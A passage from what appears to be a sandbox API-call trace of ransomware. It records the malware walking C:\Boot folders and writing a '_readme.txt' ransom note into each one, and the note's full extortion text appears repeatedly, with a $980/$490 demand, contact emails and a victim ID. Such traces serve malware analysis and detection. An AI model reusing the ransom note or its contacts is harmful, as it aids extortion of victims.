hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.691] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0173.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.691] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.691] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.691] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.691] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.691] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.692] CloseHandle (hObject=0x690) returned 1 [0173.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.693] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e4ff360, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4ff360, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.693] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e4ff360, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4ff360, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.693] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.693] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e4ff360, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e4ff360, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4ff360, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.693] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e4ff360, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e4ff360, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4ff360, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.693] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.693] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.696] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0173.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.696] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.696] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.696] PathFindFileNameW (pszPath="") returned="" [0173.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.696] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.697] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.697] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8d2f0 [0173.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.697] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.697] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0173.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.697] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0173.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.698] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.698] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of 